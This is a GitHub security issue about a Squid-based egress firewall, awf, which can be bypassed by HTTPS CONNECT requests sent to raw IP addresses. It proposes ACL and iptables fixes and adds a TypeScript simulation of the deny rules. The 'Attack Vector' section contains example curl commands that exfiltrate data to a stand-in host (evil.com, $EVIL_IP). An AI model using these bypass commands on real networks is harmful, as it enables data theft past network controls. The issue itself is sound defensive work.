
[Security] Direct IP + TLS connections may bypass domain filtering #137

@Mossaka

Description

Priority

P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

  • Only traffic to Squid (172.30.0.10) and DNS servers is allowed
  • All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

  1. Squid ACL: Explicit deny for non-domain CONNECT requests
  2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

  • src/squid-config.ts - Add IP CONNECT deny rule
  • src/squid-config.test.ts - Test IP CONNECT is denied
  • Verification script for testing

Testing

  • Direct IP HTTPS is blocked
  • Domain-based HTTPS still works
  • Squid logs show IP CONNECT attempts as denied
  • Host iptables provides backup blocking
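
The CONNECT-target classification this issue is about, as an added example that is not part of the awf project's code: it parses CONNECT request lines (including the `[addr]:port` form used for IPv6 literals), applies Option A's dotted-quad regex alongside an IPv6 companion pattern, emits the proposed Squid fragment with the `-n` flag, and simulates the `http_access` order against a few constructed request lines. Assumptions that are mine and not from the issue: the Squid version awf ships supports `-n` on `dstdom_regex` (which disables the reverse lookup Squid otherwise attempts for IP-based URLs before matching), Squid presents an IPv6 host to the ACL without its brackets, and all function and sample names below are hypothetical.

```typescript
// Added example, not code from the awf project. Models the check behind
// Option A and shows where the dotted-quad regex alone falls short (IPv6).
import * as net from "node:net";

export type TargetKind = "ipv4" | "ipv6" | "domain";
export interface ConnectTarget { host: string; port: number; kind: TargetKind }

// Parse "CONNECT host:port HTTP/1.x"; IPv6 literals arrive as "[addr]:port".
export function parseConnectTarget(requestLine: string): ConnectTarget | null {
  const m = /^CONNECT\s+(\S+)\s+HTTP\/1\.[01]\s*$/.exec(requestLine);
  if (!m) return null;
  const authority = m[1];
  let host: string;
  let portStr: string;
  if (authority.startsWith("[")) {
    const close = authority.indexOf("]");
    if (close < 0 || authority[close + 1] !== ":") return null;
    host = authority.slice(1, close);
    portStr = authority.slice(close + 2);
  } else {
    const colon = authority.lastIndexOf(":");
    if (colon < 0) return null;
    host = authority.slice(0, colon);
    portStr = authority.slice(colon + 1);
  }
  const port = Number(portStr);
  if (!/^\d+$/.test(portStr) || port < 1 || port > 65535) return null;
  const v = net.isIP(host); // 4, 6, or 0 for "not an IP literal"
  return { host, port, kind: v === 4 ? "ipv4" : v === 6 ? "ipv6" : "domain" };
}

// Option A's regex exactly as proposed in the issue: dotted quads only.
export const IPV4_LITERAL = /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/;
// Companion pattern for IPv6 literals: hex digits and at least one colon,
// which no DNS hostname contains. Assumes Squid hands the ACL the address
// without brackets (assumption, verify against the Squid version in use).
export const IPV6_LITERAL = /^[0-9a-f]*:[0-9a-f:.]*$/i;

// The squid.conf fragment from Option A, extended to IPv6 and given -n so
// the literal is matched as-is rather than replaced by a reverse-DNS name
// (assumption: the deployed Squid supports -n on dstdom_regex).
export function squidIpConnectDenyRules(): string {
  return [
    "# Deny CONNECT to IP literals (no domain to check against the allowlist)",
    `acl ip_connect dstdom_regex -n ${IPV4_LITERAL.source}`,
    `acl ip_connect dstdom_regex -n -i ${IPV6_LITERAL.source}`,
    "http_access deny ip_connect",
  ].join("\n");
}

// Simulate the http_access order: ip_connect deny first, then the
// --allow-domains list (exact match or subdomain), then default deny.
export function decideConnect(
  requestLine: string,
  allowedDomains: string[],
): "allow" | "deny" {
  const t = parseConnectTarget(requestLine);
  if (!t) return "deny"; // malformed request line never reaches an allow rule
  if (IPV4_LITERAL.test(t.host) || IPV6_LITERAL.test(t.host)) return "deny";
  const host = t.host.toLowerCase();
  const allowed = allowedDomains.some((d) => {
    const dom = d.toLowerCase();
    return host === dom || host.endsWith("." + dom);
  });
  return allowed ? "allow" : "deny";
}

// Constructed sample request lines: the two from the issue plus an IPv6
// literal, a subdomain and a non-allowlisted domain (hypothetical inputs).
export const SAMPLE_REQUESTS = [
  "CONNECT github.com:443 HTTP/1.1",
  "CONNECT 140.82.114.4:443 HTTP/1.1",
  "CONNECT [2606:4700::1111]:443 HTTP/1.1",
  "CONNECT api.github.com:443 HTTP/1.1",
  "CONNECT evil.com:443 HTTP/1.1",
];

export function decideAll(allowed: string[]): Record<string, "allow" | "deny"> {
  const out: Record<string, "allow" | "deny"> = {};
  for (const line of SAMPLE_REQUESTS) out[line] = decideConnect(line, allowed);
  return out;
}

// Run stand-alone: print the generated rules and the decisions.
console.log(squidIpConnectDenyRules());
console.log(decideAll(["github.com"]));
```

The point the simulation makes: with only Option A's dotted-quad pattern, `IPV4_LITERAL.test("2606:4700::1111")` is false, so an IPv6 CONNECT would fall through to the domain allowlist and be denied only by the default deny (or by the reverse lookup, if one is attempted). A test in `src/squid-config.test.ts` should therefore cover both literal forms, not just the IPv4 case.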

Metadata

Labels

bug (Something isn't working)